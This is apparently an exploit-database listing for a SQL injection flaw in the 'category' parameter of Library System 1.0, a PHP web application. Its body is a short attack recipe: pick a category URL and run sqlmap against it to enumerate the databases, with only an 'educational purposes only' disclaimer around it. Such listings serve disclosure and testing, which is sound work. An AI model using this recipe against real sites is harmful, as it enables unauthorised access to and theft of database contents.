Library system 1.0 category sql injection Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2021-01-25 | Type : webapps | Platform : php
This exploit / vulnerability Library system 1.0 category sql injection is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: Library System 1.0 - 'category' SQL Injection
# Exploit Author: Aitor Herrero
# Date: 2021-01-22
# Vendor Homepage:
# Software Link:
# Version: 1.0
# Tested On: Windows 10 + XAMPP 7.4.4
# Description: Library System 1.0

#STEP 1 : Go to the principal main
#STEP 2 : Choose a category example :http://localhost:8080/libsystem/libsystem/index.php?category=3
#STEP 3: Run your sqlmap example:
sqlmap -u "http://localhost:8080/libsystem/libsystem/index.php?category=3" --dbs